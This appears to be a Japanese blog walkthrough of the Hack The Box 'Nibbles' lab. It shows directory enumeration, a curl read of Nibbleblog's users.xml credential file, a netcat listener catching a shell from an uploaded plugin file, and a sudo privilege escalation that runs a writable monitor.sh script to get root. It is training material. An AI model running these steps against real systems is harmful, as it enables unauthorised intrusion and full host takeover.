[Hack The Box]Nibblesをやってみた

情報取集してみる

Spartaでポートスキャンします。

dirb http://10.10.10.75/nibbleblog/
 — — Scanning URL: http://10.10.10.75/nibbleblog/ — — 
==> DIRECTORY: http://10.10.10.75/nibbleblog/admin/
+ http://10.10.10.75/nibbleblog/admin.php (CODE:200|SIZE:1401)
==> DIRECTORY: http://10.10.10.75/nibbleblog/content/
+ http://10.10.10.75/nibbleblog/index.php (CODE:200|SIZE:2987)
==> DIRECTORY: http://10.10.10.75/nibbleblog/languages/
==> DIRECTORY: http://10.10.10.75/nibbleblog/plugins/
+ http://10.10.10.75/nibbleblog/README (CODE:200|SIZE:4628)
==> DIRECTORY: http://10.10.10.75/nibbleblog/themes/
root@kali:~# curl http://10.10.10.75/nibbleblog/content/private/users.xml
<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?>
<users><user username=”admin”><id type=”integer”>0</id>
curl http://10.10.10.75/nibbleblog/README
root@kali:~# curl http://10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014–04–01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

Nibbleblogの脆弱性をついてみる

Nibbleblog 4.0.3をググります。

nc -lvp 1234
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
root@kali:~# nc -lvp 1234
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)

権限を昇格してみる

シェルがとぎれてしまいます。👇このテクニックでシェルをアップグレードします。なぜこうなるのかは正直よく分かりません。

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
CTRL+ Z
stty raw -echo
fg
nibbler@Nibbles:/$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$ cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
mkdir -p home/nibbler/personal/stuff
cd /home/nibbler/personal/stuff
vi monitor.sh
#!/bin/sh
bash
chmod +x monitor.sh
monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store